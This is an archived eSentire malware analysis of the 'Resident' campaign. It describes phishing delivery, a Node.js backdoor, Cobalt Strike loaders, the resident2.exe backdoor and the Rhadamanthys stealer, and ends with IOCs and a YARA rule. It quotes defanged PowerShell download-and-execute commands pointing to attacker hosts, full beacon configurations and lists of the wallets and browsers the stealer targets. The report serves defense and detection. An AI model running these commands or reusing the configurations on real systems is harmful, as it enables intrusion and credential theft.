eSentire Threat Intelligence Malware Analysis: Resident Campaign
By eSentire Threat Response Unit (TRU)
Archived: 2026-04-05 18:09:02 UTC
Since November 2022, the eSentire Threat Response Unit (TRU) has observed the resurgence of what we believe to be a
malicious campaign targeting the manufacturing, commercial, and healthcare organizations. The campaign is similar to the
one reported by Trend Micro researchers in December 2020. The campaign is believed to be conducted by native Russian
speaking threat actor(s).
This malware analysis references four separate incidents where our machine-learning PowerShell classifier, Bluesteel
detected malicious PowerShell commands executing a script from an attacker hosted domain. It delves deeper into the
technical details of how the Resident campaign operates and our security recommendations to protect your organization
from being exploited.
Key Takeaways
The Resident campaign is named after the custom backdoor that the threat actor(s) retrieved from one of the
established sessions with the command and control (C2) server.
The backdoor has the capabilities to achieve persistence and deploy secondary payloads.
The Resident campaign is delivered via drive-by downloads leveraging compromised websites and phishing emails
containing the fake OneDrive attachment that leads to the page hosting the JavaScript payload.
Resident threat actor(s) retrieve multiple MSI installers that contain the tools used for post-compromise objectives.
eSentire's Threat Intelligence team has observed the campaign delivering Rhadamanthys stealer.
These insights are based on four separate incidents targeting manufacturing, commercial, and healthcare
organizations.
Initial Infection Vector
The initial infection vector we have observed is a phishing email. It should be noted that the SANS Internet Storm Center
has also observed the campaign spreading via drive-by downloads. The threat actor(s) are using email hijacking to deliver
the malicious payload with a PDF attachment. The attacker(s) adds the sender domain to Vesta Control Panel to make it look
legitimate when the user browses to the domain (Figure 1).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 1 of 34

Figure 1: Phishing email
The PDF attachment contains the link to the domain that sends the user to saprefx[.]com domain and based on the geo
location of the user, the domain will either redirect the user to the final domain that hosts the JavaScript payload or displays
the TeamViewer installer page as shown below (Figure 2).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 2 of 34

Figure 2: The redirect chain
The JavaScript payload is usually hosted on compromised WordPress websites. An example of the initial JavaScript payload
is shown in Figure 3.
Figure 3: JavaScript snippet
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 3 of 34

After the user opens the JavaScript attachment, the script would directly download and execute the MSI file using
InstallProduct method. In our example, the first retrieved MSI installer dropped Terminal_App_Service VBS (Visual Basic
Script) file under ProgramData/Cis folder (we also observed the name Imdb.vbs being used (MD5:
c3f9b1fa3bcde637ec3d88ef6a350977)).
The VBS file reaches out to the C2 with the serial number of the C drive on the infected machine as a parameter then it
retrieves the Windows Installer product and runs it without the user’s knowledge in the background. The script enters the
loop where it would continue retrieving and installing the MSI files every 9368 milliseconds (Figure 4).
Figure 4: Malicious VBS script dropped from the first MSI file
The retrieved MSI files (we observed approximately 3 MSI files being retrieved originating from the VBS script), contain
the tools or scripts to take a screenshot of the host at the time of infection; this is completed with an AutoHotKey script. We
have also observed AutoIt, Python scripts, and i_view32.exe tool used to take the screenshot of the host.
Case Study #1
During the first campaign, our TRU team observed the threat actor dropping the backdoor, Cobalt Strike payload, and the
Python script responsible for taking a screenshot of the host. Here are some of the files that were observed dropped on the
endpoint during the first incident:
sdv.vbs (C:\ProgramData\sdv) – MD5: 0e5598b0a72bf83378056ae52be6eda4, the script uses WScript.shell object to
query the Windows Management Instrumentation (WMI) for information about active processes, caption, command
line, creation date, computer name, executable path, OS (Operating Systems) name, and Windows version. It then
sends the gathered information along with drive (C:\) serial number to the C2 (Figure 5).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 4 of 34

Figure 5: sdv.vbs script
screen1.pyw (C:\ProgramData\sdv) – MD5: a628240139c04ec84c0e110ede5bb40b, Python script that is responsible
for taking a screenshot and sending to the C2 with a serial drive number (Figure 6).
Figure 6: snippet of screen1.pyw
hcmd.exe (AppData\Roaming\hcmd) – node.exe, MD5: f5182a0fa1f87c2c7538b9d8948ad3ce
Imdb.vbs (MD5: c3f9b1fa3bcde637ec3d88ef6a350977).
index.js (MD5: 5bdb1ac2a38ab3e43601eee055b1983f), under AppData\Roaming\hcmd folder – one of the main
scripts deployed by the Resident campaign. The script serves as a backdoor and runs with a specific argument via the
renamed node.exe binary (hcmd.exe) – hcmd.exe index.js 2450639401. The script is using Socket.IO for bi-https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 5 of 34

directional communication and is setting up a command line interface that allows the infected host to connect to a C2
server via port 3000 using the given 'hwid' (Hardware ID) and 'password'.
Once the connection is established with the C2, the code sets up event listeners for connect, disconnect, cmd-ping,
and cmd-command events. The code logs a message to the console and when the disconnect and disconnect events
are triggered, When the cmd-ping event is triggered, the code sends a cmd-pong message with the hwid. Finally,
when the cmd-command event is triggered, the code executes the given command from the C2 in the terminal and
logs the output (Figure 7).
Figure 7: Snippet of index.js backdoor
node_modules directory that contains the dependencies for node.exe (AppData\Roaming\hcmd).
7765676.exe (similar to the Cobalt Strike PowerShell DLL payload that we will mention later in this report) – the
Cobalt Strike executable that was dropped via the active session with the C2 server via the backdoor access.
We have observed persistence techniques being created via Startup. Two shortcut files were created under the Startup folder.
CUGraphic.lnk (Startup persistence) – the shortcut is responsible for launching the AutoHotKey script under
ProgramData\2020 (Figure 8).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 6 of 34

Figure 8: CUGraphic.lnk content
Imdb.lnk (Startup persistence) – the shortcut file is pointing to the directory C:\ProgramData\Cis\. Upon running
the malicious MSI installer, it installs the malicious “application” which is the Imdb.vbs script. The Application ID in
the registry (e.g., HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-
1866265027-1870850910-1579135973-1000\Products\985AA98E08645254995AFEA67F8AC3B6\Features\) allows
the VBS file to run upon startup with the shortcut pointing to the directory.
Application ID is a unique identifier assigned to a shortcut file when it is created. The Application ID is used to track
the shortcut file and its associated application, so that Windows can properly manage the shortcut and its associated
application (Figure 9).
Figure 9: Shortcut file, installed application and the Application ID in the registry
So, what about the PowerShell?
The malicious PowerShell command mentioned before retrieves and executes the PowerShell script from 31.41.244[.]142.
The PowerShell script loads kernel32.dll and crypt32.dll via LoadLibraryA and uses the function CryptStringToBinaryA
from crypt32.dll to convert the base64 string to a binary format (Figure 10).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 7 of 34

Figure 10: Malicious PowerShell script containing the Cobalt Strike payload hosted on attacker's domain
It then creates a file mapping of the binary data with the CreateFileMappingA function from kernel32.dll and maps the
malicious payload into memory with MapViewOfFile function from the kernel32.dll. Finally, it invokes the mapped binary
payload with the Invoke method.
The malicious payload which is the Cobalt Strike loader (MD5: f8d780f77553e7780ebcf917844571b0) enumerates the
“powershell.exe” process using CreateToolhelp32Snapshot. It then attempts to request read and write access rights to the
process. If it fails to get the access, the payload terminates (Figure 11).
Figure 11: The payload enumerates for PowerShell process
The loader uses API hashing, shown in Figure 12.
Figure 12: Hashed APIs
Specifically using CRC32 with JAMCRC algorithm to hash the APIs with the 32-bit polynomial 0xEDB88320 that is used
in CRC32 checksum table (Figure 13).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 8 of 34

Figure 13: CRC32 checksum table
The malicious payload initially loads APIs from kernel32.dll, then the rest of the APIs from libraries such as advapi32.dll,
wininet.dll and ws2_32.dll. We can create a quick IDAPython script to rename the DWORDs that store the API value
(Figure 14).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 9 of 34

Figure 14: IDAPython script to calculate the CRC32 JAMCRC hash and rename the DWORDs
The loader sample allocates the memory and decodes to MZRE header which is known for Cobalt Strike payloads that use
magic_mz_x86 option to override the MZ header. The decoding routing uses a bitwise rotation as shown in Figure 15.
Figure 15: The loader allocates the memory and partially decrypts the Cobalt Strike payload
The decoding function can be implemented as follows:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 10 of 34

n = 1
for byte in byte_array:
 b = byte & 255
 ror = ((b >> (n & 7)) | (b << (8 - (n & 7)))) & 255
 n += 1
 print(ror)
The Cobalt Strike configuration is shown below:
{
 "BeaconType": [
 "HTTP"
 ],
 "Port": 80,
 "SleepTime": 60000,
 "MaxGetSize": 1048576,
 "Jitter": 0,
 "C2Server": "31.41.244[.]142,/g.pixel",
 "HttpPostUri": "/submit.php",
 "Malleable_C2_Instructions": [],
 "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==",
 "HttpGet_Verb": "GET",
 "HttpPost_Verb": "POST",
 "HttpPostChunk": 0,
 "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
 "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe",
 "CryptoScheme": 0,
 "Proxy_Behavior": "Use IE settings",
 "Watermark": 1580103824,
 "bStageCleanup": "False",
 "bCFGCaution": "False",
 "KillDate": 0,
 "bProcInject_StartRWX": "True",
 "bProcInject_UseRWX": "True",
 "bProcInject_MinAllocSize": 0,
 "ProcInject_PrependAppend_x86": "Empty",
 "ProcInject_PrependAppend_x64": "Empty",
 "ProcInject_Execute": [
 "CreateThread",
 "SetThreadContext",
 "CreateRemoteThread",
 "RtlCreateUserThread"
 ],
 "ProcInject_AllocationMethod": "VirtualAllocEx",
 "bUsesCookies": "True",
 "HostHeader": ""
}
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 11 of 34

Figure 16: Cobalt Strike payload loaded into memory
Case Study #2
In this incident, the threat actor(s) deployed their custom written backdoor tool named resident2.exe. The backdoor
resident2.exe was dropped from the Cobalt Strike session and designates the end of the infection chain (Figure 17). The
tools such as windows-kill.exe that terminates Windows processes and netping.exe (presumably the network ping tool) were
also brought onboard by the threat actor.
Figure 17: Infection chain (1)
The files we have observed being dropped from this case:
s.au3 – (MD5: b8822d99850ac70cb3de0e1d39639add) – AutoIt script (dropped under C:\ProgramData\jaf\s.au3).
The script is written in AutoIt scripting language; it takes the screenshot of the infected machine using functions such
as _ScreenCapture_SetJPGQuality() and _ScreenCapture_Capture(), it then reads the content of the screenshot file
(s.jpg), sets the request headers and sends it to the C2 server with the serial number of the C:\ drive recorded from
s.vbs script (Figure 18).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 12 of 34

Figure 18: s.au3 script (screenshot capture)
index.js (AppData\Roaming\hcmd\)
au3.exe (ProgramData\2020\) – AutoHotKey tool.
s.exe (ProgramData\jaf\) – AutoIT tool.
Imdb.vbs (C:\ProgramData\Cis).
hcmd.exe (AppData\Roaming\hcmd\hcmd.exe).
s.vbs (ProgramData\jaf\) – gets the serial number of the C:\ drive and outputs it to a text file s.txt (Figure 19).
Figure 19: s.vbs script
windows-kill.exe (AppData\Roaming\hcmd\node_modules\nodemon\bin\) – Windows process “killer”.
netping.exe (downloaded via PowerShell: powershell Invoke-WebRequest hxxps://temp[.]sh/BOTnt/netping.exe -
OutFile C:\programdata\netping.exe) – we could not retrieve the file from the system, but we assume it is the
network ping tool that pings a range of IP addresses.
resident2.exe – the custom written backdoor.
As you might have noticed, the index.js backdoor is also present in this case. The backdoor session was established via the
command hcmd.exe index.js 2094656165.
During the established backdoor session two Cobalt Strike payloads were downloaded from 62.204.41[.]171 via the
following commands:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://62.204.41[.]171:80/a'))"
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://62.204.41[.]171:80/b'))"
The threat actor(s) also performed reconnaissance with the following commands:
net group “domains admins” /domain
whoami /groups
ipconfig /all
What is resident2.exe?
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 13 of 34

The binary is 32-bit executable written in C programming language. Upon successful execution the binary creates a copy of
itself under C:\ProgramData\RtlUpd as RtlUpd.exe. The persistence is achieved via a scheduled task named “RtlUpd” that
runs every 10 minutes starting from the time when the binary was first executed (Figure 20).
Figure 20: Task Scheduler function
The strings in the binary are encrypted with RC4 (Figure 21).
Figure 21: RC4 KSA algorithm
The encrypted strings are stored in .rdata section and would skip the first 4 bytes and take the next 4-5 bytes of the
hexadecimal string as an RC4 key, the rest of the string would be the encrypted data (Figure 22).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 14 of 34

Figure 22: The structure of the encrypted data and key

The binary contains the custom base64-encoded and RC4 encrypted string of in the /GET requests as shown in Figure
23.

Figure 23: GET request within the pcap data
This function in Figure 24 is retrieving the volume serial number, computer name, and username of the current system. It
then base64-encodes the retrieved values.
Figure 24: Retrieving the data and base64-encode them
The CRC32 function in Figure 25 is supposed to calculate the checksum for the computer name and username separately
although it produces different checksum values for unknown reasons.
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 15 of 34

Figure 25: Implementation of CRC32 in the binary
Moving forward, the binary build the string based on the pattern %d|%08X%08X|%d|%d|%d|%d|%hs|%hs which can be
translated into |<VolumeSerialNumber||||calc_val||.
The can be 0 or the hexadecimal representation of the image base address of the binary. The calc_val contains the calculated
value based on the wProcessorArchitecture value plus the value returned from GetSystemMetrics.
The API retrieves the build number if the system is Windows Server 2003 R2, otherwise it would return 0 and if the value is
0 – a1 will hold the value 4 otherwise it will be 6 (Figure 26).
Figure 26: String builder and calc_val functions
Next, the binary would use generated string pattern and “24de21a8-a70b-4364-82b1-dc08434c93d7” as an RC4 key to
produce a value that they will use within the base64-encoding algorithm along with the generated string pattern we
mentioned before. The final result is a custom base64-encoded string (Figure 27).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 16 of 34

Figure 27: Custom base64-encoding algorithm
Further analyzing the binary, we noticed that the binary checks if the argument to run the binary contains “/p” and if it does,
the binary returns 1 and reaches out C2. If the binary contains 0 arguments, it proceeds with dropping RtlUpd.exe under
%ALLUSERSPROFILE%\RtlUpd.
We have noticed that the binary has the capability of dropping RtlUpd.dll as well under %ALLUSERSPROFILE%\RtlUpd
and %APPDATA%\RtlUpd, it then schedules the tasks to run the files whether it is RtlUpd.exe or RtlUpd.dll. The reason it
performs the checks is to confirm if the copy of the payload already exists on the system (the scheduled task is set to run the
binary copy with a “/p” argument) and if the copy exists it simply initiates the C2 connection.
The binary resolves the APIs dynamically as it’s shown in Figure 28.
Figure 28: Resolving APIs dynamically
One of the main functionalities of resident2 binary is the ability to execute the payloads that can be placed by the threat
actor(s) during the hands-on intrusion activity or directly retrieved from C2. The binary abuses LOLBAS (Living Off the
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 17 of 34

Land Binaries and Scripts) – shell32 and certutil.exe to run the malicious payloads. The binary checks if the payload has
“.exe” or “.dll” extensions.
If the payload is an executable, the command “rundll32.exe shell32.dll,ShellExec_RunDLL %s” would be executed; if the
payload is a DLL – the command “rundll32.exe %s, Start“ is set to run, where %s is the payload filename (Figure 29).
Figure 29: Extension check and execute the commands accordingly
eSentire TRU is almost certain one of the function’s functionalities is to run the Cobalt Strike payload deployed by threat
actor(s). One of the Cobalt Strike payloads we have analyzed contained the “Start” value as the ordinal.
As for certutil.exe, the “-decode” parameter can be used to decode Base64-encoded data. In our case, the attacker(s) can
decode the Base64-encoded payload that is hidden within the certificate file (Figure 30).
Figure 30: Example of how attacker(s) can abuse certutil.exe
The scheduled task would be created to run the payloads using the techniques described above where the class identifier
CLSID is calculated based on the name of the payload, its unique identifier and volume serial number (Figure 31).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 18 of 34

Figure 31: GUID build
Case Study #3
In this incident, the threat actors initiate their intrusion by abusing wscript.exe to launch the malicious JavaScript file.
Additionally, the graphic editor tool i_view32.exe was also dropped to take a screenshot of the infected host. The threat
actor also attempted to deploy the Rhadamanthys stealer (Figure 32).
Figure 32: Infection chain (2)
Files dropped:
app.js – (C:\ProgramData\Dored) – MD5: 89e320093ce9d3a9e61e58c1121b76e7, the script runs an executable file
called i_view32.exe (IrfanView – graphic viewer, editor tool) with two arguments "/capture" and
"/convert=skev.jpg". This command will capture an image and convert it to the file format "skev.jpg" (Figure 33).
Figure 33: app.js script
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 19 of 34

index.js (C:\ProgramData\Dored) – MD5: 44839c07923d8a37f49782e6a2567950, the script sends the screenshot
taken with IrfanView tool along with the serial drive number to the C2 (Figure 34).
Figure 34: index.js script
sdv.vbs – (ProgramData\sdv\) – gets the serial number of the C:\ drive and outputs it to a text file t.txt.
i_view32.exe – graphic editor tool
skev.jpg – screenshot image (C:\ProgramData\Dored)
CUGraphic.lnk
au3.ahk (ProgramData\2020\)
au3.exe
The Rhadamanthys Stealer Case
During the case study #3 (Figure 35), at the end of the infection chain during the established C2 session, the threat actor(s)
attempted to run Rhadamanthys Stealer on the host.
Figure 35: Stealer execution
The stealer or, to be specific, the loader part of the stealer can be easily identified by the rundll32.exe process spawning
from the initial payload with the command pattern: rundll32.exe nsis_uns{hexadecimal_numbers}, PrintUIEntry
|5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|
{redacted}
The nsis_uns DLL is dropped under the path C:\Users\\AppData\Roaming\ and is used to map the retrieved shellcode into
the memory space and execute it.
Rhadamanthys Stealer first appeared in September 2022 on the Russian speaking forum (Figure 36).
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 20 of 34

Figure 36: Rhamadanthys Stealer for sale
Currently the stealer developer is working on integrating the keylogger plugin into the stealer (Figure 37).
Figure 37: Stealer developer's post on the hacking forum
The stealer exfiltrates system information, screenshot, Browser credentials and cookies, crypto wallets, FTP, Mail clients,
Two Factor Authentication applications (RoboForm, WinAuth, Authy Desktop), password manager (KeePass), VPN,
Messenger data (Psi+, Pidgin, TOX, Discord, Telegram), Steam, TeamViewer SecureCRT, additionally it also exfiltrates
NoteFly, Notezilla, Simple Sticky Notes, Windows 7 and 10 Sticky Notes. The stealer admin panel is operated within
CentOS 7 (Ubuntu 16) panels.
Some of the crypto wallet extensions that the stealer exfiltrates:
Auvitas Wallet BitApp Crocobit
Exodus Finnie GuildWallet
ICONex Jaxx Keplr
Liquality MTV Wallet Math
Metamask Mobox Nifty
Oxygen Phantom Rabet Wallet
Ronin Wallet Slope Wallet Sollet
Starcoin Swash Terra Station
Tron XinPay Yoroi Wallet
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 21 of 34

ZilPay Wallet binance coin98
The stealer can perform brute-force against crypto wallets using the list of custom passwords.
Browsers:
360ChromeX 360 Secure Browser 7Star
AVAST Browser AVG Browser Atom
Avant Browser BlackHawk Blisk
Brave CCleaner Browser CentBrowser
Chedot CocCoc Coowon
Cyberfox Dragon Element Browser
Epic Privacy Browser Falkon Firefox
Firefox Nightly GhostBrowser Google Chrome
Hummingbird IceDragon Iridium
K-Meleont Kinza Kometa Browser
SLBrowser MapleStudio Maxthon
Naver Whale Opera Opera GX
Opera Neon QQBrowser SRWare Iron
SeaMonkey Sleipnir5 Slimjet
Superbird Twinkstar UCBrowser
Xvast citrio Pale Moon
Torch Web Browser UR Browser Vivaldi
Crypto Wallets:
Armory AtomicWallet Atomicdex
Binance Wallet Bisq BitcoinCore
BitcoinGold Bytecoink Coinomi wallets
DashCore DeFi-Wallet Defichain-electrum
Dogecoin Electron Cash Electrum
Electrum-LTC Ethereum Wallet Exodus
Frame Guarda Jaxx
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 22 of 34

LitecoinCore Monero MyCrypto
MyMonero Safepay Solar wallet
Tokenpocket WalletWasabi Zap
Zcash Zecwallet Lite
FTP clients:
Cyberduck FTP Navigator
FTPRush FlashFXP
Smartftp TotalCommander
Winscp Ws_ftp
Coreftp
Mail Clients:
CCheckMail Claws-mail
GmailNotifierPro Mailbird
Outlook PostboxApp
TheBat! Thunderbird
TrulyMail eM Client
Foxmail
VPN:
AzireVPN NordVPN
OpenVPN PrivateVPN_Global_AB
ProtonVPN WindscribeVPN
The stealer can retrieve the files on the host via the File Grabber module (Figure 38).
Figure 38: File Grabber module
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 23 of 34

The Extension module contains the functionality to run the PowerShell scripts and download the binaries directly from the
Internet via PowerShell (Figure 39).
Figure 39: Extension module
The Task section allows the stealer to perform certain actions upon execution (Figure 40).
Figure 40: Task configuration
The Server section (Figure 41) contains the main configurations for the stealer such as the option to enable area restrictions.
If the option is on, the stealer will not work in countries such as Russia and Ukraine, although the stealer developer
mentioned that the stealer will not work in Commonwealth of Independent States (CIS) countries).
In addition, it also configures ports for server-side binding address (the main communication with the C2 including
shellcode retrieval after the successful execution) and admin panel binding address (the attacker can change the ports from
the default :443 to any other ports for the admin panel access).
The attacker can also change the gateway address which is the directory where the stealer retrieves the shellcode, “/blob”
serves as a default directory.
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 24 of 34

Figure 41: Snippet of the Server section
The Build section (Figure 42) specifies how the binary is built including the options to enable anti-debugging, anti VM,
launching the executable with administrative privileges and the file pump feature to increase the file size by filling it up with
0s to bypass Antivirus and some sandbox checks. The exfiltrated data is transmitted via WebSocket over the AES256
encrypted channel.
Figure 42: Build section
If the Task section is configured, the process .tmp.exe will be spawned as shown in Figure 43.
Figure 43: Process tree with Task and Extension modules enabled
The dllhost.exe is spawned if the Extension module is configured to retrieve additional payloads or run PowerShell
scripts/commands.
Case Study #4
In this incident, the threat actors first leveraged au3.exe that then spawned a serious of other malicious executables.
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 25 of 34

Figure 44: Infection chain (3)
Files dropped by the threat actor(s):
Terminal App Service.vbs (C:\ProgramData\Cis)
app.js (C:\ProgramData\Dored) – similar to the previous case
au3.exe (C:\ProgramData\2020)
au3.ahk (C:\ProgramData\2020)
index.js (C:\ProgramData\Dored) – screenshot sender script, similar to the 3rd incident
i_view32.exe (C:\ProgramData\Dored)
skev.jpg – screenshot image (C:\ProgramData\Dored)
hcmd.exe (AppData\Roaming\hcmd\hcmd.exe)
index.js (AppData\Roaming\hcmd)
hcmd.exe (AppData\Roaming\hcmd)
After obtaining the backdoor session to the infected machine via the command hcmd.exe index.js 2450639401, the actor(s)
ran the systeminfo command to collect detailed system information and attempted to ping the Domain Controller. The threat
actor(s) also attempted to pull the Cobalt Strike payload from the server which happens to be also the one hosting Cobalt
Strike.
The command line used to retrieve the Cobalt Strike payload from the established backdoor session:
powershell.exe -nop -w hidden -c "IEX ((new-object
net.webclient).downloadstring('hxxp[:]//62.204.41[.]155:80/sjj63NS'
The following is the beacon configuration:
{
 "BeaconType": [
 "HTTP"
 ],
 "Port": 80,
 "SleepTime": 60000,
 "MaxGetSize": 1048576,
 "Jitter": 0,
 "C2Server": "62.204.41[.]155,/pixel",
 "HttpPostUri": "/submit.php",
 "Malleable_C2_Instructions": [],
 "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==",
 "HttpGet_Verb": "GET",
 "HttpPost_Verb": "POST",
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 26 of 34

"HttpPostChunk": 0,
 "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
 "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe",
 "CryptoScheme": 0,
 "Proxy_Behavior": "Use IE settings",
 "Watermark": 1580103824,
 "bStageCleanup": "False",
 "bCFGCaution": "False",
 "KillDate": 0,
 "bProcInject_StartRWX": "True",
 "bProcInject_UseRWX": "True",
 "bProcInject_MinAllocSize": 0,
 "ProcInject_PrependAppend_x86": "Empty",
 "ProcInject_PrependAppend_x64": "Empty",
 "ProcInject_Execute": [
 "CreateThread",
 "SetThreadContext",
 "CreateRemoteThread",
 "RtlCreateUserThread"
 ],
 "ProcInject_AllocationMethod": "VirtualAllocEx",
 "bUsesCookies": "True",
 "HostHeader": ""
}
Conclusion
Our TRU team identified a malicious campaign known as Resident, which is believed to be carried out by Russian native-speaking threat actors. The threat actors behind Resident are attempting to infiltrate networks and exfiltrate data from
infected machines by using backdoors, Cobalt Strike, and stealers. In particular, they have been observed using the
Rhamadanthys stealer, which is known for its stealthy capabilities, instead of other more well-known stealers such as
Redline and Vidar.
The threat actors are using these techniques to gain a foothold and propagate across a network laterally, making it difficult
for victims to detect or respond quickly. The campaign could cause significant disruption and financial losses for those
impacted. As such, eSentire’s Threat Intelligence team in collaboration with TRU have engineered various detection
capabilities to detect and prevent Resident infections.
How eSentire is Responding
Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create
practical outcomes for our customers. We are taking a comprehensive response approach to combat modern cybersecurity
threats by deploying countermeasures, such as:
Implementing threat detections and BlueSteel, our machine-learning powered PowerShell classifier, to identify
malicious command execution and exploitation attempts and ensure that eSentire has visibility and detections are in
place across eSentire MDR for Endpoint.
Performing global threat hunts for indicators associated with Resident campaign and Rhadamanthys Stealer.
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 27 of 34

Our detection content is supported by investigation runbooks, ensuring our SOC (Security Operations Center) analysts
respond rapidly to any intrusion attempts related to a known malware Tactics, Techniques, and Procedures. In addition, TRU
closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess
customer impact.
Recommendations from eSentire’s Threat Response Unit (TRU)
We recommend implementing the following controls to help secure your organization against Rhadamanthys stealer and
Resident campaign:
Confirm that all devices are protected with Endpoint Detection and Response (EDR) solutions.
Using Phishing and Security Awareness Training (PSAT), educate your employees regarding the risk of commodity
stealers and drive-by downloads.
Ensure standard procedures are in place for employees to submit potentially malicious content for review.
Use Windows Attack Surface Reduction rules to block JavaScript and VBScript from launching downloaded content.
While the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical
business decisions must be made. Preventing the various attack paths utilized by threat actor(s) requires actively monitoring
the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during
active intrusions.
eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat
intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to
advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your
business ahead of disruption.
Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire
Security Specialist.
Appendix
https://www.trendmicro.com/pl_pl/research/20/l/stealth-credential-stealer-targets-us-canadian-bank-customers.html
https://isc.sans.edu/diary/29376
https://socket.io/docs/v4/
https://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot
https://twitter.com/Kostastsale/status/1607681239837966337?s=20&t=f7VZgGvjiy7TLzBHd2bAKg
https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/
Indicators of Compromise
Name Indicators
Initial JS payload 9a68add12eb50dde7586782c3eb9ff9c
Initial JS payload 38f030c2bfa6d74a35e2aeeee0341a244b63d15c200a808f07e3e98e7a841643
Resident2.exe 6e1cdf38adb2d052478c6ed8e06a336a
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 28 of 34

nsis_uns.dll 0b669e2eaf21429d273cf40b096166af
AutoHotKey 4685811c853ceaebc991c3a8406694bf
au3.ahk a3ee8449df56b6fa545392eff470d77d
index.js (backdoor) 5bdb1ac2a38ab3e43601eee055b1983f
Imdb.vbs c3f9b1fa3bcde637ec3d88ef6a350977
MSI d741c5622ab1eafc0a7cfa5598a6ce77
MSI 9a1115c0263cbff5a5c87704cc19cf5f
sdv.vbs 381afda50832a82a16ee48edf54b620c
7765676.exe (Cobalt Strike) f199b4ef3db12ee28a05b74e61cec548
index.js (screenshot sender) 44839c07923d8a37f49782e6a2567950
app.js (i_view32.exe runner) 89e320093ce9d3a9e61e58c1121b76e7
i_view32.exe b103655d23aab7ff124de7ea4fbc2361
screen1.pyw a628240139c04ec84c0e110ede5bb40b
hcmd.exe f5182a0fa1f87c2c7538b9d8948ad3ce
s.au3 (AutoIt script) b8822d99850ac70cb3de0e1d39639add
s.vbs fbe2ed26374be91231f8a9056f28dddd
windows-kill.exe de5ecb14c8a2212beb309284b5a62aae
Cobalt Strike 62.204.41[.]155
Cobalt Strike 31.41.244[.]142
Cobalt Strike 62.204.41[.]171
C2 85.192.49[.]106
C2 89.107.10[.]7
C2 79.132.128[.]79
Yara rules
rule Resident_binary
{
 meta:
 author = "eSentire Threat Intelligence"
 date = "2023-01-17"
 version = "1.0"
 MD5 = “6e1cdf38adb2d052478c6ed8e06a336a”
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 29 of 34

strings:
 $certificate_blob = {
 C7 00 2D 2D 2D 2D
 C7 40 ?? 2D 42 45 47
 C7 40 ?? 49 4E 20 43
 C7 40 ?? 45 52 54 49
 C7 40 ?? 46 49 43 41
 C7 40 ?? 54 45 2D 2D
 C7 40 ?? 2D 2D 2D 0D
 C6 40 ?? 0A
 }
 $guid_build = {
 FF 15 ?? ?? ?? ??
 48 8D 0D ?? ?? ?? ??
 E8 ?? ?? ?? ??
 41 89 F1
 41 89 D8
 4C 89 E9
 49 89 C4
 0F B6 44 24 ??
 89 7C 24 ??
 4C 89 E2
 89 44 24 ??
 0F B6 44 24 ??
 89 44 24 ??
 0F B6 44 24 ??
 89 44 24 ??
 0F B6 44 24 ??
 89 44 24 ??
 0F B6 44 24 ??
 89 44 24 ??
 0F B6 44 24 ??
 89 44 24 ??
 0F B6 44 24 ??
 89 44 24 ??
 0F B6 44 24 ??
 89 44 24 ??
 FF 15 ?? ?? ?? ??
 }
 
 condition:
 any of them
 
}
